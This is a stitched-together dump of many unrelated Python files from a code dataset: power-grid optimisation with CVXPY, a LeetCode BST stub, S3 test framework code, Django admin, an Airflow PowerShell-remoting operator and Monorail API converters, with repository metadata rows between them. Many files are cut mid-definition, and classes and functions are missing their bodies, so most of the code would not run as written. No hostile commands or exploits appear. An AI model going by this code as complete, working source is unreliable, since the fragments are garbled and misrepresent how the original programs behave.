4.6676,
""")
Gmax = np.matrix("3; 2; 4; 7") # maximum generator power
c = np.matrix("4; 8; 5; 3") # supply generator costs
d = np.matrix("""
1.6154
2.3405
1.0868
1.5293
2.2197
1.0148
1.2083
1.3041
""")# network power demands
# graph incidence matrix
A = np.matrix(""" -1 -1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 0 -1 -1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 -1 -1 0 0 0 0 0 0 -1 ;
0 0 0 0 0 0 -1 0 0 0 0 0 0 0 -1 0 -1 0 ;
1 0 0 0 1 -1 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 1 1 0 -1 0 1 -1 0 0 0 0 0 0 0 0 0 0 ;
0 0 0 1 0 0 0 0 -1 1 0 0 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 1 1 0 0 0 -1 0 1 0 0 1 ;
0 0 0 0 0 0 0 0 0 0 1 -1 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 0 0 1 1 -1 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 ;
0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 -1 1 0
""")
g = Variable(k)
p = Variable(m)
obj = Minimize(c.T*g)
constraints = [A*p == vstack(-g, d.T), abs(p) <= Pmax.T, 0 <= g, g <= Gmax]
prob = Problem(obj, constraints)
tic = time.time()
val = prob.solve()
toc = time.time()
TIME += toc - tic
ANSWERS.append(val)
pass #print val
pass #print g.value
# N - 1 contingency
g = Variable(k)
flows = []
obj = Minimize(c.T*g)
for i in range(m):
flows.append(Variable(m))
constraints = [g <= Gmax, 0 <= g]
for i in range(m): # N -1 redundancy
constraints.append(A*flows[i] == vstack(-g, d.T))
constraints.append( flows[i][i] == 0 )
constraints.append( abs(flows[i]) <= Pmax.T )
prob = Problem(obj, constraints)
tic = time.time()
val = prob.solve()
toc = time.time()
TIME += toc - tic
ANSWERS.append(val)
pass #print val
pass #print g.value
# the code below is not data for the problem
# it is used only to generate the network graph
# x-y coordinates
# each row is node x-y coordinates
XY = np.matrix("""
1.5 5.2;
4.9 5;
6.9 3.5;
1.9 3.5;
0.2 4.4;
3.2 4.8;
5.9 4.5;
3.9 3.6;
5.9 2.5;
3.9 3;
1.4 2.5;
0 3
""");
# node adjacency matrix
Ad = -A*A.T
Ad = Ad - np.diag(np.diag(Ad))
epsx = 0.05; epsy = 0.15; # text placing offset
# plotting
import matplotlib.pyplot as plt
for i in range(12): #plot edges
for j in range(i):
if Ad[i,j] == 1:
pass #plt.plot((XY[i,0], XY[j,0]), (XY[i,1], XY[j,1]), 'k-')
for j in range(k): #plot nodes
pass #plt.plot(XY[j,0],XY[j,1],'rs', markersize=12)
pass #plt.text(XY[j,0]-epsx,XY[j,1]+epsy,str(j+1))
for j in range(k,n):
pass #plt.plot(XY[j,0],XY[j,1],'ko')
pass #plt.axis('off')
pass #plt.savefig('pwr_net.eps')
if __name__ == '__main__':
pass #plt.show()
| 23.083333 | 75 | 0.513538 |
6a213e8a5b6a8886b1f3aeab6a75af090df46ca9
| 996 |
py
|
Python
|
LeetCode/530 Minimum Absolute Difference in BST.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
LeetCode/530 Minimum Absolute Difference in BST.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
LeetCode/530 Minimum Absolute Difference in BST.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
# Binary Search Tree
# Given a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.
#
# Example:
#
# Input:
#
# 1
# \
# 3
# /
# 2
#
# Output:
# 1
#
# Explanation:
# The minimum absolute difference is 1, which is the difference between 2 and 1 (or between 2 and 3).
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
| 23.162791 | 124 | 0.566265 |
6a240de4a4b62bd30eb577321f80af837069962e
| 2,029 |
py
|
Python
|
backends/search/__init__.py
|
dev-easyshares/company
|
61842839121f308619c59a8f52ab76c8b9dcdd30
|
[
"MIT"
] | null | null | null |
backends/search/__init__.py
|
dev-easyshares/company
|
61842839121f308619c59a8f52ab76c8b9dcdd30
|
[
"MIT"
] | null | null | null |
backends/search/__init__.py
|
dev-easyshares/company
|
61842839121f308619c59a8f52ab76c8b9dcdd30
|
[
"MIT"
] | null | null | null |
from company.choices import fr as choices
from mighty.errors import BackendError
import datetime, logging
logger = logging.getLogger(__name__)
CHOICES_APE = dict(choices.APE)
CHOICES_LEGALFORM = dict(choices.LEGALFORM)
CHOICES_SLICE = dict(choices.SLICE_EFFECTIVE)
| 31.215385 | 90 | 0.670281 |
6a24c49a2e92d735c1970a4ba7a5a35023549f08
| 504 |
py
|
Python
|
app/database/database.py
|
luisornelasch/melp
|
82ff5c84d0df866ee64da10b96f61400c0809845
|
[
"MIT"
] | null | null | null |
app/database/database.py
|
luisornelasch/melp
|
82ff5c84d0df866ee64da10b96f61400c0809845
|
[
"MIT"
] | null | null | null |
app/database/database.py
|
luisornelasch/melp
|
82ff5c84d0df866ee64da10b96f61400c0809845
|
[
"MIT"
] | null | null | null |
from sqlalchemy import create_engine, engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os
SQLALCHEMY_DATABASE_URL = os.getenv("DATABASE_URL").replace("postgres://", "postgresql+psycopg2://")
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
| 24 | 100 | 0.753968 |
6a25b6baad0282a34406b60b6191667dfe9a128b
| 13,698 |
py
|
Python
|
ragweed/framework.py
|
soumyakoduri/ragweed
|
7d4a729ff761fe1ca073b7ceade46acf1321e9fd
|
[
"MIT"
] | null | null | null |
ragweed/framework.py
|
soumyakoduri/ragweed
|
7d4a729ff761fe1ca073b7ceade46acf1321e9fd
|
[
"MIT"
] | null | null | null |
ragweed/framework.py
|
soumyakoduri/ragweed
|
7d4a729ff761fe1ca073b7ceade46acf1321e9fd
|
[
"MIT"
] | null | null | null |
import sys
import os
import boto
import boto.s3.connection
import json
import inspect
import pickle
import bunch
import yaml
import ConfigParser
import rados
from boto.s3.key import Key
from nose.plugins.attrib import attr
from nose.tools import eq_ as eq
from .reqs import _make_admin_request
ragweed_env = None
suite = None
def rtest_decode_json(d):
if '__pickle' in d:
return pickle.loads(str(d['__pickle']))
return d
def read_config(fp):
config = bunch.Bunch()
g = yaml.safe_load_all(fp)
for new in g:
print bunch.bunchify(new)
config.update(bunch.bunchify(new))
return config
str_config_opts = [
'user_id',
'access_key',
'secret_key',
'host',
'ceph_conf',
'bucket_prefix',
]
int_config_opts = [
'port',
]
bool_config_opts = [
'is_secure',
]
| 29.649351 | 141 | 0.593663 |
6a27987a8cba79e77e7ec06fe0349b417f6ae225
| 44 |
py
|
Python
|
exposing/_version.py
|
w4k2/exposing
|
6abbced18aa567ed45426ba915f3b56e7aeca028
|
[
"BSD-3-Clause"
] | null | null | null |
exposing/_version.py
|
w4k2/exposing
|
6abbced18aa567ed45426ba915f3b56e7aeca028
|
[
"BSD-3-Clause"
] | 1 |
2018-05-28T10:35:02.000Z
|
2018-05-28T10:35:02.000Z
|
exposing/_version.py
|
w4k2/exposing
|
6abbced18aa567ed45426ba915f3b56e7aeca028
|
[
"BSD-3-Clause"
] | null | null | null |
"""
``exposing``
"""
__version__ = '0.2.2'
| 7.333333 | 21 | 0.5 |
6a27b2bcfa7e4d8b0487cdb6693479a656fd6bb3
| 136 |
py
|
Python
|
opensteer/teams/admin.py
|
reckonsys/opensteer
|
3c47bcf0a8de8e363ce8cced02827fe21a0d406a
|
[
"MIT"
] | 5 |
2019-10-14T05:48:43.000Z
|
2021-08-29T17:42:48.000Z
|
opensteer/teams/admin.py
|
reckonsys/opensteer
|
3c47bcf0a8de8e363ce8cced02827fe21a0d406a
|
[
"MIT"
] | 26 |
2019-09-19T08:51:45.000Z
|
2022-03-12T00:05:29.000Z
|
opensteer/teams/admin.py
|
reckonsys/opensteer
|
3c47bcf0a8de8e363ce8cced02827fe21a0d406a
|
[
"MIT"
] | 1 |
2020-01-08T21:50:05.000Z
|
2020-01-08T21:50:05.000Z
|
from django.contrib import admin
from opensteer.teams.models import Team, Member
admin.site.register(Team)
admin.site.register(Member)
| 22.666667 | 47 | 0.823529 |
6a2905a1e278bec5cf1d153f6d2fadf970789157
| 2,657 |
py
|
Python
|
tests/test_utils.py
|
ozora-ogino/tflite-human-tracking
|
d1be51c628e1464b5e2953a611df6e974a9ffbaa
|
[
"MIT"
] | 3 |
2021-12-20T00:43:28.000Z
|
2022-03-12T00:54:42.000Z
|
tests/test_utils.py
|
ozora-ogino/tflite-human-tracking
|
d1be51c628e1464b5e2953a611df6e974a9ffbaa
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
ozora-ogino/tflite-human-tracking
|
d1be51c628e1464b5e2953a611df6e974a9ffbaa
|
[
"MIT"
] | 5 |
2021-12-03T08:59:18.000Z
|
2022-03-17T11:25:38.000Z
|
from src.utils import check_direction, direction_config, is_intersect
# pylint:disable=unexpected-keyword-arg
| 42.174603 | 90 | 0.530297 |
6a296c2965af2f5264f62e16fe377851c022b76e
| 44 |
py
|
Python
|
scpp_base/scpp_base/src/db/__init__.py
|
scorelab/social-currency
|
f539893104bdfe098cfa58c8d9fabcbb00874c52
|
[
"Apache-2.0"
] | 4 |
2018-10-02T06:31:18.000Z
|
2019-11-16T15:21:34.000Z
|
scpp_base/scpp_base/src/db/__init__.py
|
horizon00/social-currency
|
f539893104bdfe098cfa58c8d9fabcbb00874c52
|
[
"Apache-2.0"
] | 2 |
2017-12-06T11:54:14.000Z
|
2019-11-11T11:34:06.000Z
|
scpp_base/scpp_base/src/db/__init__.py
|
horizon00/social-currency
|
f539893104bdfe098cfa58c8d9fabcbb00874c52
|
[
"Apache-2.0"
] | 5 |
2017-02-27T10:10:41.000Z
|
2019-11-11T11:45:37.000Z
|
_all__ = ["db_handler","coin_value_handler"]
| 44 | 44 | 0.772727 |
6a29d2f85143afe8ae63f5fd3499c691c4db69b3
| 2,792 |
py
|
Python
|
test/test_parameter_set.py
|
crest-cassia/caravan_search_engine
|
5c3bd3176b44e8c3145ba67b4240678e18a1394e
|
[
"MIT"
] | null | null | null |
test/test_parameter_set.py
|
crest-cassia/caravan_search_engine
|
5c3bd3176b44e8c3145ba67b4240678e18a1394e
|
[
"MIT"
] | null | null | null |
test/test_parameter_set.py
|
crest-cassia/caravan_search_engine
|
5c3bd3176b44e8c3145ba67b4240678e18a1394e
|
[
"MIT"
] | null | null | null |
import unittest
from caravan.tables import Tables
from caravan.parameter_set import ParameterSet
if __name__ == '__main__':
unittest.main()
| 36.736842 | 71 | 0.609599 |
6a29e328b66b3aa40c02b6c801e1beb3b20cffb7
| 1,470 |
py
|
Python
|
tests/unit/transport/s3/test_settings.py
|
TinkoffCreditSystems/overhave
|
b0ab705ef5c5c5a65fa0b14b173b64fd7310e187
|
[
"Apache-2.0"
] | 33 |
2021-02-01T15:49:37.000Z
|
2021-12-20T00:44:43.000Z
|
tests/unit/transport/s3/test_settings.py
|
TinkoffCreditSystems/overhave
|
b0ab705ef5c5c5a65fa0b14b173b64fd7310e187
|
[
"Apache-2.0"
] | 46 |
2021-02-03T12:56:52.000Z
|
2021-12-19T18:50:27.000Z
|
tests/unit/transport/s3/test_settings.py
|
TinkoffCreditSystems/overhave
|
b0ab705ef5c5c5a65fa0b14b173b64fd7310e187
|
[
"Apache-2.0"
] | 1 |
2021-12-07T09:02:44.000Z
|
2021-12-07T09:02:44.000Z
|
import pytest
from pydantic import ValidationError
from overhave.transport import OverhaveS3ManagerSettings
| 39.72973 | 88 | 0.742857 |
6a2a3c06f511758a8f808e719520fdb3ebac69cd
| 15,015 |
py
|
Python
|
examples/elCmd.py
|
mark-nicholson/python-editline
|
c23f1071c4b832a92f66e2f49142e5c5f00e500d
|
[
"BSD-3-Clause"
] | 4 |
2017-10-05T19:34:32.000Z
|
2021-05-18T23:29:44.000Z
|
examples/elCmd.py
|
mark-nicholson/python-editline
|
c23f1071c4b832a92f66e2f49142e5c5f00e500d
|
[
"BSD-3-Clause"
] | 2 |
2018-03-30T22:38:17.000Z
|
2018-03-30T22:39:13.000Z
|
examples/elCmd.py
|
mark-nicholson/python-editline
|
c23f1071c4b832a92f66e2f49142e5c5f00e500d
|
[
"BSD-3-Clause"
] | null | null | null |
"""A generic class to build line-oriented command interpreters.
Interpreters constructed with this class obey the following conventions:
1. End of file on input is processed as the command 'EOF'.
2. A command is parsed out of each line by collecting the prefix composed
of characters in the identchars member.
3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method
is passed a single argument consisting of the remainder of the line.
4. Typing an empty line repeats the last command. (Actually, it calls the
method `emptyline', which may be overridden in a subclass.)
5. There is a predefined `help' method. Given an argument `topic', it
calls the command `help_topic'. With no arguments, it lists all topics
with defined help_ functions, broken into up to three topics; documented
commands, miscellaneous help topics, and undocumented commands.
6. The command '?' is a synonym for `help'. The command '!' is a synonym
for `shell', if a do_shell method exists.
7. If completion is enabled, completing commands will be done automatically,
and completing of commands args is done by calling complete_foo() with
arguments text, line, begidx, endidx. text is string we are matching
against, all returned matches must begin with it. line is the current
input line (lstripped), begidx and endidx are the beginning and end
indexes of the text being matched, which could be used to provide
different completion depending upon which position the argument is in.
The `default' method may be overridden to intercept commands for which there
is no do_ method.
The `completedefault' method may be overridden to intercept completions for
commands that have no complete_ method.
The data member `self.ruler' sets the character used to draw separator lines
in the help messages. If empty, no ruler line is drawn. It defaults to "=".
If the value of `self.intro' is nonempty when the cmdloop method is called,
it is printed out on interpreter startup. This value may be overridden
via an optional argument to the cmdloop() method.
The data members `self.doc_header', `self.misc_header', and
`self.undoc_header' set the headers used for the help function's
listings of documented functions, miscellaneous topics, and undocumented
functions respectively.
"""
import string, sys
__all__ = ["Cmd"]
PROMPT = '(Cmd) '
IDENTCHARS = string.ascii_letters + string.digits + '_'
if __name__ == '__main__':
mc = MyCmd()
mc.cmdloop()
| 35.75 | 79 | 0.556777 |
6a2bc3b1189d8cb91dbce9466649429945439058
| 1,127 |
py
|
Python
|
ecommerce-website/orders/admin.py
|
Shanu85/FCS_Project
|
def3437d58b4d2ff00e26c0a5ca769af66eccfad
|
[
"MIT"
] | null | null | null |
ecommerce-website/orders/admin.py
|
Shanu85/FCS_Project
|
def3437d58b4d2ff00e26c0a5ca769af66eccfad
|
[
"MIT"
] | null | null | null |
ecommerce-website/orders/admin.py
|
Shanu85/FCS_Project
|
def3437d58b4d2ff00e26c0a5ca769af66eccfad
|
[
"MIT"
] | 1 |
2022-01-03T13:40:11.000Z
|
2022-01-03T13:40:11.000Z
|
from django.contrib import admin
from .models import Order, receiverInfo
| 35.21875 | 92 | 0.696539 |
6a2bdc47419473e5c8f04286a711270211d71607
| 2,513 |
py
|
Python
|
data_structures/linked_lists/ll-kth-from-end/ll_kth.py
|
jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
data_structures/linked_lists/ll-kth-from-end/ll_kth.py
|
jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
data_structures/linked_lists/ll-kth-from-end/ll_kth.py
|
jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
from node import Node
| 25.383838 | 58 | 0.512933 |
6a2be20f58b11b8306e1cbf1b9ec46cf140c201d
| 1,559 |
py
|
Python
|
MuonAnalysis/MomentumScaleCalibration/test/LikelihoodPdfDBReader_cfg.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852 |
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
MuonAnalysis/MomentumScaleCalibration/test/LikelihoodPdfDBReader_cfg.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371 |
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
MuonAnalysis/MomentumScaleCalibration/test/LikelihoodPdfDBReader_cfg.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240 |
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("LIKELIHOODPDFDBREADER")
# process.load("MuonAnalysis.MomentumScaleCalibration.local_CSA08_Y_cff")
process.source = cms.Source("EmptySource",
numberEventsInRun = cms.untracked.uint32(1),
firstRun = cms.untracked.uint32(1)
)
process.load("Configuration.StandardSequences.MagneticField_cff")
process.load("Geometry.CMSCommonData.cmsIdealGeometryXML_cfi")
process.load("Geometry.CommonTopologies.globalTrackingGeometry_cfi")
process.load("RecoMuon.DetLayers.muonDetLayerGeometry_cfi")
process.load("Geometry.MuonNumbering.muonNumberingInitialization_cfi")
process.load("RecoMuon.TrackingTools.MuonServiceProxy_cff")
# process.source = cms.Source("PoolSource",
# fileNames = cms.untracked.vstring()
# )
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.poolDBESSource = cms.ESSource("PoolDBESSource",
BlobStreamerName = cms.untracked.string('TBufferBlobStreamingService'),
DBParameters = cms.PSet(
messageLevel = cms.untracked.int32(2),
authenticationPath = cms.untracked.string('/afs/cern.ch/cms/DB/conddb')
),
timetype = cms.untracked.string('runnumber'),
connect = cms.string('sqlite_file:dummy2.db'),
toGet = cms.VPSet(cms.PSet(
record = cms.string('MuScleFitLikelihoodPdfRcd'),
tag = cms.string('MuScleFitLikelihoodPdf_2_1_12')
))
)
process.LikelihoodPdfDBReaderModule = cms.EDAnalyzer(
"LikelihoodPdfDBReader"
)
process.p1 = cms.Path(process.LikelihoodPdfDBReaderModule)
| 30.568627 | 79 | 0.76331 |
6a2c1076d5d797f1927b5d8d8d4594e8e5c92647
| 9,615 |
py
|
Python
|
fast_fine_tuna/fast_fine_tuna.py
|
vinid/fast_fine_tuna
|
2d128f58df0407448cdb2e179972573afa7ac636
|
[
"MIT"
] | null | null | null |
fast_fine_tuna/fast_fine_tuna.py
|
vinid/fast_fine_tuna
|
2d128f58df0407448cdb2e179972573afa7ac636
|
[
"MIT"
] | null | null | null |
fast_fine_tuna/fast_fine_tuna.py
|
vinid/fast_fine_tuna
|
2d128f58df0407448cdb2e179972573afa7ac636
|
[
"MIT"
] | null | null | null |
from transformers import AutoModel, AutoModelForSequenceClassification, AutoTokenizer, AutoConfig
from sklearn.model_selection import StratifiedKFold
import numpy as np
import torch
from fast_fine_tuna.dataset import MainDatasetDouble, MainDataset
from transformers import AdamW
from torch.utils.data import DataLoader
import os
from tqdm import tqdm
from fast_fine_tuna.models import MiniModel
from torch import nn
| 40.914894 | 114 | 0.615081 |
6a2c58ba82079e0bdc04e7b2c1c567a97cd9075d
| 451 |
py
|
Python
|
Message/Message.py
|
gauravyeole/KVstoreDB
|
1c7c83b158e95daec998fba62a89fa1211a05089
|
[
"MIT"
] | 1 |
2019-10-01T12:22:38.000Z
|
2019-10-01T12:22:38.000Z
|
Message/Message.py
|
gauravyeole/KVstoreDB
|
1c7c83b158e95daec998fba62a89fa1211a05089
|
[
"MIT"
] | null | null | null |
Message/Message.py
|
gauravyeole/KVstoreDB
|
1c7c83b158e95daec998fba62a89fa1211a05089
|
[
"MIT"
] | null | null | null |
# Message class Implementation
# @author: Gaurav Yeole <[email protected]>
| 20.5 | 49 | 0.569845 |
6a2db7981b57ab2addb91eebdfdaf255263aca79
| 230 |
py
|
Python
|
wpt/websockets/websock_handlers/open_delay_wsh.py
|
gsnedders/presto-testo
|
a0acfbef13a3f8cae67cc7145216d31b67aa8eb4
|
[
"BSD-3-Clause"
] | null | null | null |
wpt/websockets/websock_handlers/open_delay_wsh.py
|
gsnedders/presto-testo
|
a0acfbef13a3f8cae67cc7145216d31b67aa8eb4
|
[
"BSD-3-Clause"
] | null | null | null |
wpt/websockets/websock_handlers/open_delay_wsh.py
|
gsnedders/presto-testo
|
a0acfbef13a3f8cae67cc7145216d31b67aa8eb4
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
from mod_pywebsocket import msgutil
import time
| 19.166667 | 43 | 0.795652 |
6a2f97206c5b9ec5564b46970658837924dcfae3
| 2,404 |
py
|
Python
|
airflow/providers/microsoft/psrp/operators/psrp.py
|
augusto-herrmann/airflow
|
7ee4295dd3f7dba4fcd763286c7823bb1707fe99
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 4 |
2021-06-26T13:37:35.000Z
|
2022-01-11T15:49:44.000Z
|
airflow/providers/microsoft/psrp/operators/psrp.py
|
augusto-herrmann/airflow
|
7ee4295dd3f7dba4fcd763286c7823bb1707fe99
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 33 |
2021-07-25T10:29:30.000Z
|
2022-03-30T04:39:06.000Z
|
airflow/providers/microsoft/psrp/operators/psrp.py
|
augusto-herrmann/airflow
|
7ee4295dd3f7dba4fcd763286c7823bb1707fe99
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import TYPE_CHECKING, List, Optional, Sequence
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator
from airflow.providers.microsoft.psrp.hooks.psrp import PSRPHook
if TYPE_CHECKING:
from airflow.utils.context import Context
| 34.342857 | 89 | 0.687604 |
6a2fb0bff9f0be5443177122a457a61eac9dfba3
| 17,104 |
py
|
Python
|
appengine/monorail/services/api_pb2_v1_helpers.py
|
mithro/chromium-infra
|
d27ac0b230bedae4bc968515b02927cf9e17c2b7
|
[
"BSD-3-Clause"
] | 1 |
2018-01-02T05:47:07.000Z
|
2018-01-02T05:47:07.000Z
|
appengine/monorail/services/api_pb2_v1_helpers.py
|
mithro/chromium-infra
|
d27ac0b230bedae4bc968515b02927cf9e17c2b7
|
[
"BSD-3-Clause"
] | null | null | null |
appengine/monorail/services/api_pb2_v1_helpers.py
|
mithro/chromium-infra
|
d27ac0b230bedae4bc968515b02927cf9e17c2b7
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is govered by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Convert Monorail PB objects to API PB objects"""
import datetime
import logging
import time
from framework import framework_constants
from framework import framework_helpers
from framework import permissions
from framework import timestr
from proto import api_pb2_v1
from proto import project_pb2
from proto import tracker_pb2
from services import issue_svc
from services import project_svc
from services import user_svc
from tracker import tracker_bizobj
from tracker import tracker_helpers
def convert_project(project, config, role):
"""Convert Monorail Project PB to API ProjectWrapper PB."""
return api_pb2_v1.ProjectWrapper(
kind='monorail#project',
name=project.project_name,
externalId=project.project_name,
htmlLink='/p/%s/' % project.project_name,
summary=project.summary,
description=project.description,
role=role,
issuesConfig=convert_project_config(config))
def convert_project_config(config):
"""Convert Monorail ProjectIssueConfig PB to API ProjectIssueConfig PB."""
return api_pb2_v1.ProjectIssueConfig(
kind='monorail#projectIssueConfig',
restrictToKnown=config.restrict_to_known,
defaultColumns=config.default_col_spec.split(),
defaultSorting=config.default_sort_spec.split(),
statuses=[convert_status(s) for s in config.well_known_statuses],
labels=[convert_label(l) for l in config.well_known_labels],
prompts=[convert_template(t) for t in config.templates],
defaultPromptForMembers=config.default_template_for_developers,
defaultPromptForNonMembers=config.default_template_for_users)
def convert_status(status):
"""Convert Monorail StatusDef PB to API Status PB."""
return api_pb2_v1.Status(
status=status.status,
meansOpen=status.means_open,
description=status.status_docstring)
def convert_label(label):
"""Convert Monorail LabelDef PB to API Label PB."""
return api_pb2_v1.Label(
label=label.label,
description=label.label_docstring)
def convert_template(template):
"""Convert Monorail TemplateDef PB to API Prompt PB."""
return api_pb2_v1.Prompt(
name=template.name,
title=template.summary,
description=template.content,
titleMustBeEdited=template.summary_must_be_edited,
status=template.status,
labels=template.labels,
membersOnly=template.members_only,
defaultToMember=template.owner_defaults_to_member,
componentRequired=template.component_required)
def convert_person(user_id, cnxn, services, trap_exception=False):
"""Convert user id to API AtomPerson PB."""
if not user_id:
return None
try:
user = services.user.GetUser(cnxn, user_id)
except user_svc.NoSuchUserException as ex:
if trap_exception:
logging.warning(str(ex))
return None
else:
raise ex
days_ago = None
if user.last_visit_timestamp:
secs_ago = int(time.time()) - user.last_visit_timestamp
days_ago = secs_ago / framework_constants.SECS_PER_DAY
return api_pb2_v1.AtomPerson(
kind='monorail#issuePerson',
name=user.email,
htmlLink='https://%s/u/%d' % (framework_helpers.GetHostPort(), user_id),
last_visit_days_ago=days_ago,
email_bouncing=bool(user.email_bounce_timestamp),
vacation_message=user.vacation_message)
def convert_issue_ids(issue_ids, mar, services):
"""Convert global issue ids to API IssueRef PB."""
# missed issue ids are filtered out.
issues = services.issue.GetIssues(mar.cnxn, issue_ids)
result = []
for issue in issues:
issue_ref = api_pb2_v1.IssueRef(
issueId=issue.local_id,
projectId=issue.project_name,
kind='monorail#issueRef')
result.append(issue_ref)
return result
def convert_issueref_pbs(issueref_pbs, mar, services):
"""Convert API IssueRef PBs to global issue ids."""
if issueref_pbs:
result = []
for ir in issueref_pbs:
project_id = mar.project_id
if ir.projectId:
project = services.project.GetProjectByName(
mar.cnxn, ir.projectId)
if project:
project_id = project.project_id
try:
issue = services.issue.GetIssueByLocalID(
mar.cnxn, project_id, ir.issueId)
result.append(issue.issue_id)
except issue_svc.NoSuchIssueException:
logging.warning(
'Issue (%s:%d) does not exist.' % (ir.projectId, ir.issueId))
return result
else:
return None
def convert_issue(cls, issue, mar, services):
"""Convert Monorail Issue PB to API IssuesGetInsertResponse."""
config = services.config.GetProjectConfig(mar.cnxn, issue.project_id)
granted_perms = tracker_bizobj.GetGrantedPerms(
issue, mar.auth.effective_ids, config)
issue_project = services.project.GetProject(mar.cnxn, issue.project_id)
component_list = []
for cd in config.component_defs:
cid = cd.component_id
if cid in issue.component_ids:
component_list.append(cd.path)
cc_list = [convert_person(p, mar.cnxn, services) for p in issue.cc_ids]
cc_list = [p for p in cc_list if p is not None]
field_values_list = []
field_id_dict = {
fd.field_id: fd.field_name for fd in config.field_defs}
for fv in issue.field_values:
field_name = field_id_dict.get(fv.field_id)
if not field_name:
logging.warning('Custom field %d of project %s does not exist',
fv.field_id, issue_project.project_name)
continue
val = None
if fv.user_id:
val = _get_user_email(
services.user, mar.cnxn, fv.user_id)
elif fv.str_value:
val = fv.str_value
elif fv.int_value:
val = str(fv.int_value)
new_fv = api_pb2_v1.FieldValue(
fieldName=field_name,
fieldValue=val,
derived=fv.derived)
field_values_list.append(new_fv)
resp = cls(
kind='monorail#issue',
id=issue.local_id,
title=issue.summary,
summary=issue.summary,
projectId=issue_project.project_name,
stars=issue.star_count,
starred=services.issue_star.IsItemStarredBy(
mar.cnxn, issue.issue_id, mar.auth.user_id),
status=issue.status,
state=(api_pb2_v1.IssueState.open if
tracker_helpers.MeansOpenInProject(
tracker_bizobj.GetStatus(issue), config)
else api_pb2_v1.IssueState.closed),
labels=issue.labels,
components=component_list,
author=convert_person(issue.reporter_id, mar.cnxn, services),
owner=convert_person(issue.owner_id, mar.cnxn, services),
cc=cc_list,
updated=datetime.datetime.fromtimestamp(issue.modified_timestamp),
published=datetime.datetime.fromtimestamp(issue.opened_timestamp),
blockedOn=convert_issue_ids(issue.blocked_on_iids, mar, services),
blocking=convert_issue_ids(issue.blocking_iids, mar, services),
canComment=permissions.CanCommentIssue(
mar.auth.effective_ids, mar.perms, issue_project, issue,
granted_perms=granted_perms),
canEdit=permissions.CanEditIssue(
mar.auth.effective_ids, mar.perms, issue_project, issue,
granted_perms=granted_perms),
fieldValues=field_values_list)
if issue.closed_timestamp > 0:
resp.closed = datetime.datetime.fromtimestamp(issue.closed_timestamp)
if issue.merged_into:
resp.mergedInto=convert_issue_ids([issue.merged_into], mar, services)[0]
if issue.owner_modified_timestamp:
resp.owner_modified = datetime.datetime.fromtimestamp(
issue.owner_modified_timestamp)
if issue.status_modified_timestamp:
resp.status_modified = datetime.datetime.fromtimestamp(
issue.status_modified_timestamp)
if issue.component_modified_timestamp:
resp.component_modified = datetime.datetime.fromtimestamp(
issue.component_modified_timestamp)
return resp
def convert_comment(issue, comment, mar, services, granted_perms):
"""Convert Monorail IssueComment PB to API IssueCommentWrapper."""
can_delete = permissions.CanDelete(
mar.auth.user_id, mar.auth.effective_ids, mar.perms,
comment.deleted_by, comment.user_id, mar.project,
permissions.GetRestrictions(issue), granted_perms=granted_perms)
return api_pb2_v1.IssueCommentWrapper(
